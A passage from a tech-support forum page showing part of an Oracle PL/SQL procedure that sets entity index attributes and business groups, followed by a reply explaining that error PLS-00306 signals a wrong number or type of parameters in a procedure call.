    if (p_entity_type = v_bb_entity_type) then
    b_valid := customIndexAttributes(
    v_entity_id,
    p_target_dict_name,
    p_source_level1,
    p_source_entity_xref1,
    p_source_entity_xref1_type,
    p_source_dict_name1,
    p_weight1,
    p_source_level2,
    p_source_entity_xref2,
    p_source_entity_xref2_type,
    p_source_dict_name2,
    p_weight2,
    p_source_level3,
    p_source_entity_xref3,
    p_source_entity_xref3_type,
    p_source_dict_name3,
    p_weight3,
    p_source_level4,
    p_source_entity_xref4,
    p_source_entity_xref4_type,
    p_source_dict_name4,
    p_weight4,
    p_source_level5,
    p_source_entity_xref5,
    p_source_entity_xref5_type,
    p_source_dict_name5,
    p_weight5,
    p_source_level6,
    p_source_entity_xref6,
    p_source_entity_xref6_type,
    p_source_dict_name6,
    p_weight6,
    p_source_level7,
    p_source_entity_xref7,
    p_source_entity_xref7_type,
    p_source_dict_name7,
    p_weight7,
    p_source_level8,
    p_source_entity_xref8,
    p_source_entity_xref8_type,
    p_source_dict_name8,
    p_weight8,
    p_source_level8,
    p_source_entity_xref9,
    p_source_entity_xref9_type,
    p_source_dict_name9,
    p_weight9,
    p_source_level10,
    p_source_entity_xref10,
    p_source_entity_xref10_type,
    p_source_dict_name10,
    p_weight10
    end if;
    /* Insert/Update Business Groups */
    b_valid := setBusinessGroup(v_group_name1, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name2, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name3, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name4, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name5, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name6, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name7, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name8, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name9, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name10, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name11, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name12, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name13, v_entity_id, v_update_source, v_date);
    b_valid := setBusinessGroup(v_group_name14, v_entity_id, v_update_source, v_date);
    /* Insert/Update entity xref */
    b_valid := entity_xref(p_source_acct_id, p_source_system, v_entity_id);
    IF NOT b_Valid THEN
    dbms_output.put_line('INV ENT XREF 1');
    na_outparam(na_outparam.COUNT+1) := EagleGen.GetErrEdit(p_Src => g_prf_intfc,
    p_ShortDesc => 'INV ENT XREF');
    p_OUT := EagleGen.simf_table_to_varchar(na_outparam);
    RETURN;
    END IF;
    COMMIT;
    /* Pass back any warning messages */
    p_out := EagleGen.simf_table_to_varchar(na_outparam);
    END; -- End of Procedure

    The PLS-00306 error is normally a runtime error. It is telling you that the call to procedure ENTPRFMAN had either too few or too many parameters passed to it or that one or more of the parameters were of the wrong datatype.
    HTH -- Mark D Powell --

Maybe you are looking for

  • How many apple tvs can i run at once

    i want to set up a trade show booth with apple tvs and a mac mini. how many apple tvs can i run off a mac mini? i want to run different slideshows.

  • I have 2 LCDs, one will not come on

    I have a mac 2.66 quad core intel xeon with three graphics ports. I have been using an Apple 30" lcd which has worked fine. I just acquired a smaller apple LCD and plugged it in one of the extra ports. When you push the on button (lower rt side) the

  • I can't upload new BIOS f.40 on my Probook 4740s

    Hi. I can't upload new BIOS or older BIOS on my laptop. why? How can I fix it? I bought a new laptop from store with windows7 in it, but it doesnt work correctly. I downloaded a new BIOS f.40 from HP site, it showed me, that BIOS instaled in my pc is

  • Major problems with CS5

    We just moved to CS5 and are having major problems with crashing and losing text. I haven't seen these kind of issues since beginning the Indesign/Incopy workflow way back in CS2. I've got dozens of users (Indesign and Incopy) slamming me with compla

  • Office Jet 4500 G510

    Am having continual problems with this printer. Cartridge has been replaced. Now using reman. Have cleaned cartridge and aligned heads. Have error message reading 'print cartridge problem,[Black] refer to device documentation to troubleshoot.  Test p